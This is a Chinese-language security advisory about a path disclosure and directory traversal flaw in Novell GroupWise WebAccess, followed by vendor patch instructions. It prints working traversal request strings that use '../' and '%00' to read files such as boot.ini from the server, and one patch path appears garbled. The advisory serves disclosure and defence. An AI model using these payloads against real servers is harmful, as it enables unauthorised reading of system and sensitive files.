发布日期: 2001-10-15
更新日期: 2001-10-17
受影响的系统: Novell GroupWise 5.5 Novell GroupWise 6 Microsoft Windows 2000
描述:
Novell GroupWise服务器有一个基于Web的前端程序,用来访问该服务器提供的某些功能,如电子邮件。
发现其中登陆脚本“/servlet/webacc”存在安全问题,通过指定一个不存在的文件,可能导致物理路径泄露。
/servlet/webacc?User.html=noexist
通过使用“../”和“%00”可能访问该系统中相同盘符下的任意文件:
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
这可能导致敏感信息的泄露。
<*来源:Mike Shema (mike.shema@foundstone.com)
参考:http://archives.neohapsis.com/archives/bugtraq/2001-10/0103.html*>
测试程序:
警告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Mike Shema (mike.shema@foundstone.com)提供了如下测试代码:
http://server:port/servlet/webacc?User.html=../../../../../../../../boot.ini
%00
建议:
厂商补丁:
Novell已经发布了一个补丁以修复此漏洞:support.novell.com/servlet/filedownload/pub/gw6wasf.exe
详细公告见下列地址:support.novell.com/servlet/tidfinder/2960443
补丁安装方法:
1. 解开文件gw6wasf.exe.
2. 将服务器上的当前的njweb.jar文件重命名,并用补丁包中的对应文件替代:
sys:javaib
jweb.jar
(如果在NT或NetWare下,你应该将其拷贝到该文件被初始安装到的目录中)
3. 然后卸载WebAccess/WebPublisher Servlet,然后使用新文件重新加载。
   手机铃声下载 快乐多多 快来搜索好歌!       新浪企业广场诚征全国代理
|